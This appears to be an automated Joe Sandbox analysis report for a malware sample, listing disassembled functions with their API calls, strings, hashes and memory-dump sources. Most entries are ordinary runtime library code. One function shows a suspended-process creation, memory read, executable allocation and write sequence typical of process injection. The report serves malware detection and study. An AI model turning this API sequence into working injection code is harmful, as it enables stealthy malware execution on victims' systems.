Function 005F86C2 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?), ref: 005F86C9

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5b58c5338ab78b38e7050c0fccf898ad1288e55b5a9152dad3f20e8c84e0dc2d
Instruction ID: 888e4e79ff79d58e0f90215e7e320f397b5deb4985ae17d0fd5f8260cc431b58
Opcode Fuzzy Hash: 5b58c5338ab78b38e7050c0fccf898ad1288e55b5a9152dad3f20e8c84e0dc2d
Instruction Fuzzy Hash: DFC08C340016180BEF2C1A3866880BA3B02B96B3A93D41B84D271CB0FACB3D6807D600

Function 005F86C0 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?), ref: 005F86C9

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e490e4857718ef449017a9adaeed94cd6c8164f71f62aadd049b2ec915e3e99a
Instruction ID: 2be443dfd30cde8869f240073bce9c0b5f2654fd644a9d65c7a6dc9875aaa0c0
Opcode Fuzzy Hash: e490e4857718ef449017a9adaeed94cd6c8164f71f62aadd049b2ec915e3e99a
Instruction Fuzzy Hash: BFC080340011144BE71C5B3866480353B12B9173193E00B48D231CB0F5CB3ED403C710

Non-executed Functions

Function 0060C66B Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0060C671
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0060C67F
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0060C690
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0060C6A1
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0060C6B2
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0060C6C3
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0060C6D4
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0060C6E5
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0060C6F6
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0060C707
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0060C718
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0060C729
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0060C73A
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0060C74B
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0060C75C
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0060C76D
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0060C77E
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0060C78F
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0060C7A0
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0060C7B1
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0060C7C2
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0060C7D3
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0060C7E4
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0060C7F5
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0060C806
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0060C817
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0060C828
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0060C839
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0060C84A
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0060C85B
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0060C86C
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0060C87D
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0060C88E
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0060C89F
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 0060C8B0
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 0060C8C1
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 0060C8D2
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 0060C8E3
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0060C8F4
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0060C905
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0060C916

Strings

FlsSetValue, xrefs: 0060C6A7
InitializeConditionVariable, xrefs: 0060C81D
SleepConditionVariableSRW, xrefs: 0060C8A5
CompareStringEx, xrefs: 0060C8E9
CloseThreadpoolTimer, xrefs: 0060C740
kernel32.dll, xrefs: 0060C66C
CreateSymbolicLinkW, xrefs: 0060C7BC
GetFileInformationByHandleEx, xrefs: 0060C7EA
WakeAllConditionVariable, xrefs: 0060C83F
SetFileInformationByHandle, xrefs: 0060C7FB
TryAcquireSRWLockExclusive, xrefs: 0060C883
SubmitThreadpoolWork, xrefs: 0060C8C7
WakeConditionVariable, xrefs: 0060C82E
GetCurrentPackageId, xrefs: 0060C7C8
FlushProcessWriteBuffers, xrefs: 0060C784
CloseThreadpoolWait, xrefs: 0060C773
GetTickCount64, xrefs: 0060C7D9
FlsAlloc, xrefs: 0060C679
CreateSemaphoreExW, xrefs: 0060C6FC
CreateThreadpoolWait, xrefs: 0060C751
GetSystemTimePreciseAsFileTime, xrefs: 0060C80C
CloseThreadpoolWork, xrefs: 0060C8D8
ReleaseSRWLockExclusive, xrefs: 0060C894
InitOnceExecuteOnce, xrefs: 0060C6C9
SetThreadpoolTimer, xrefs: 0060C71E
CreateSemaphoreW, xrefs: 0060C6EB
InitializeSRWLock, xrefs: 0060C861
FreeLibraryWhenCallbackReturns, xrefs: 0060C795
CreateThreadpoolWork, xrefs: 0060C8B6
CreateEventExW, xrefs: 0060C6DA
SleepConditionVariableCS, xrefs: 0060C850
GetLocaleInfoEx, xrefs: 0060C8FA
InitializeCriticalSectionEx, xrefs: 0060C6B8
SetThreadpoolWait, xrefs: 0060C762
FlsGetValue, xrefs: 0060C696
CreateThreadpoolTimer, xrefs: 0060C70D
GetCurrentProcessorNumber, xrefs: 0060C7A6
WaitForThreadpoolTimerCallbacks, xrefs: 0060C72F
LCMapStringEx, xrefs: 0060C90B
AcquireSRWLockExclusive, xrefs: 0060C872
FlsFree, xrefs: 0060C685

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: a6ffaa17d01a60f1e80ca8aa5e24483cbb541b1557dffb27f954d349cf919c75
Instruction ID: e8c6f2ccd77159c9b9f2bc8a3fdfd0fb7475cc23bb32ddb1af4cae16cd75becc
Opcode Fuzzy Hash: a6ffaa17d01a60f1e80ca8aa5e24483cbb541b1557dffb27f954d349cf919c75
Instruction Fuzzy Hash: 1861BFB5952760BBD7009FB4EC1DA993EEBBB1BB03B45241AF206E6172D7B841408F58

Function 005F7050 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 005F707D
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 005F70DB
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 005F70F4
GetThreadContext.KERNEL32(?,00000000), ref: 005F7109
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 005F7129
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 005F716B
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 005F7188
VirtualFree.KERNEL32(?,00000000,00008000), ref: 005F7241

Strings

, xrefs: 005F7120
VUUU, xrefs: 005F6EF1
invalid stoi argument, xrefs: 005F7040

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
String ID: $VUUU$invalid stoi argument
API String ID: 3796053839-3954507777
Opcode ID: 980569dc504afff4162c7afb63cbd6555de0cda0cdc6c83544397aa3b5267415
Instruction ID: 50a1bca0ef75d3ceaffc61a87a4067b4dd16a044052746a70a37274bb1a5a9b4
Opcode Fuzzy Hash: 980569dc504afff4162c7afb63cbd6555de0cda0cdc6c83544397aa3b5267415
Instruction Fuzzy Hash: 64418B75244305BFE7609F50DC06FAABBE9FF89B04F400419B784E61E0D7B4A904CB96

Function 00610D23 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00610E26
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00610E72

Part of subcall function 0061256D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00612660

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00610EDE
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00610EFA
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00610F4E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00610F7B
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00610FD1

Strings

(, xrefs: 00610E32

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 1057ad9176e470e561cbeb654746698e28e798a0b9be0fe36c5d82fcedd13506
Instruction ID: 973691a89057ff905858559d9bb7ff2982b694b9c4e4d003bf158cce5ea91a47
Opcode Fuzzy Hash: 1057ad9176e470e561cbeb654746698e28e798a0b9be0fe36c5d82fcedd13506
Instruction Fuzzy Hash: EDB17C70A00615EFDB28CF68D991BBAB7B6FB48300F28855DE8069B755D770ADC1CB90

Function 00611512 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00612C0C: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00612C1F

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00611524

Part of subcall function 00612D1F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00612D49

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00611656
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 006116B6
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 006116C2
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 006116FD
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0061171E
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0061172A
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00611733
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0061174B

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$Allocation$CoresDynamic$AdjustCoreDataDistributePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalHandleIdleIncreaseInitializeLoadedProcessResetScheduler
String ID:
API String ID: 3189225155-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: 8eed31a768dbefda70add54a6b725f872d325ad1d59062cdeeef32b31f9d9cf5
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: B6815B71E006259FCB18CF68C580AADB7B7FF89304B1946ADD506AB701CB71ED92CB84

Function 006323B7 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00632439
_free.LIBCMT ref: 0063245D
_free.LIBCMT ref: 006325EA
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00646748), ref: 006325FC
_free.LIBCMT ref: 006327B6

Strings

Hgd, xrefs: 006325A5, 006325AB
Hgd, xrefs: 00632719

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: Hgd$Hgd
API String ID: 597776487-2725361215
Opcode ID: db169e539c9126cbcfc8873c09742b95393413faecbf57d446dd709ddc3d0af9
Instruction ID: da6e61e7e469637686f700e2beb06b4f9b57c73e995f0e60a07ec82cb4474eec
Opcode Fuzzy Hash: db169e539c9126cbcfc8873c09742b95393413faecbf57d446dd709ddc3d0af9
Instruction Fuzzy Hash: A5C12671A002169BDB24DF68DC61AEA7BEBAF56320F14415DE49197392E7308E42CBD4

Function 0061EB58 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0061EB91

Part of subcall function 00618E3F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00618E60

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0061EBF7
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0061EC0F
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0061EC1C

Part of subcall function 0061E6BF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0061E6E7
Part of subcall function 0061E6BF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0061E77F
Part of subcall function 0061E6BF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0061E789
Part of subcall function 0061E6BF: Concurrency::location::_Assign.LIBCMT ref: 0061E7BD
Part of subcall function 0061E6BF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0061E7C5

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: 17c554ee6ca425510461eec84efa0ae518fbb1176d9e9e45b47a577a2237c290
Instruction ID: 397d4bc9b4b4429bb7575673937da1db493f625fd308c85c0d0b8d9fb757dfa3
Opcode Fuzzy Hash: 17c554ee6ca425510461eec84efa0ae518fbb1176d9e9e45b47a577a2237c290
Instruction Fuzzy Hash: 9B518B75A002159BDF14DF64C895BEEB777AF44710F1940A8ED026B3D2CB72AE42CBA1

Function 00632BB0 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 450COMMON

Download Yara Rule

Strings

iAc, xrefs: 00632BCB, 00632D54, 00632F7D, 00632F17, 00632DA3, 00632D29
iAc, xrefs: 00632FD7, 00632E15, 00632E1D

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID: iAc$iAc
API String ID: 0-3428549756
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: 85ccc4f25ed9d25a9cfa28647365f2461dbecaa07e723a41ad42a3656a12fc3b
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: F4F11D71E0021A9FDF14CFA9D8906EEB7B2FF48314F25826DD819AB344D731AA41CB94

Function 0060CA9A Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtFlushProcessWriteBuffers.NTDLL ref: 0060CAAD

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: BuffersFlushProcessWrite
String ID:
API String ID: 2982998374-0
Opcode ID: f1e62fa592f2a86158cbaf088e71deff548979cfde3e9bd25de4ef2d91db7259
Instruction ID: 501c165289773c411c60da0d58938005bf9c52d7a323ad5ca62925352f583371
Opcode Fuzzy Hash: f1e62fa592f2a86158cbaf088e71deff548979cfde3e9bd25de4ef2d91db7259
Instruction Fuzzy Hash: C9B02232B23A300BCB08AB00BC0888E23038B80B2230A0002C802A32A0CB200C000BC0

Function 0060EF38 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 229COMMONLIBRARYCODE

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0060F1CB

Strings

pEvents, xrefs: 0060F1C3

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pEvents
API String ID: 2141394445-2498624650
Opcode ID: eeb018975f2de4a657d745a438c5063c20d00e5c77a25b010550acb1a8f99c76
Instruction ID: 7fcd4d96aa859d67e22b02a0538a0d220bc240b54db4e595f4bf652b9e73d136
Opcode Fuzzy Hash: eeb018975f2de4a657d745a438c5063c20d00e5c77a25b010550acb1a8f99c76
Instruction Fuzzy Hash: 27819F31D80219DFCF29DFA8C881BEFB7B6AF44310F144869E401A76C2DB75A945CB90

Function 0062F1FF Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0062F243

Part of subcall function 0062EDDC: _free.LIBCMT ref: 0062EDF9
Part of subcall function 0062EDDC: _free.LIBCMT ref: 0062EE0B
Part of subcall function 0062EDDC: _free.LIBCMT ref: 0062EE1D
Part of subcall function 0062EDDC: _free.LIBCMT ref: 0062EE2F
Part of subcall function 0062EDDC: _free.LIBCMT ref: 0062EE41
Part of subcall function 0062EDDC: _free.LIBCMT ref: 0062EE53
Part of subcall function 0062EDDC: _free.LIBCMT ref: 0062EE65
Part of subcall function 0062EDDC: _free.LIBCMT ref: 0062EE77
Part of subcall function 0062EDDC: _free.LIBCMT ref: 0062EE89
Part of subcall function 0062EDDC: _free.LIBCMT ref: 0062EE9B
Part of subcall function 0062EDDC: _free.LIBCMT ref: 0062EEAD
Part of subcall function 0062EDDC: _free.LIBCMT ref: 0062EEBF
Part of subcall function 0062EDDC: _free.LIBCMT ref: 0062EED1

_free.LIBCMT ref: 0062F238

Part of subcall function 0062AC95: HeapFree.KERNEL32(00000000,00000000,?,0062EF6D,?,00000000,?,?,?,0062EF94,?,00000007,?,?,0062F396,?), ref: 0062ACAB
Part of subcall function 0062AC95: GetLastError.KERNEL32(?,?,0062EF6D,?,00000000,?,?,?,0062EF94,?,00000007,?,?,0062F396,?,?), ref: 0062ACBD

_free.LIBCMT ref: 0062F25A
_free.LIBCMT ref: 0062F26F
_free.LIBCMT ref: 0062F27A
_free.LIBCMT ref: 0062F29C
_free.LIBCMT ref: 0062F2AF
_free.LIBCMT ref: 0062F2BD
_free.LIBCMT ref: 0062F2C8
_free.LIBCMT ref: 0062F300
_free.LIBCMT ref: 0062F307
_free.LIBCMT ref: 0062F324
_free.LIBCMT ref: 0062F33C

Strings

`'e, xrefs: 0062F215
8"e, xrefs: 0062F2EB

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
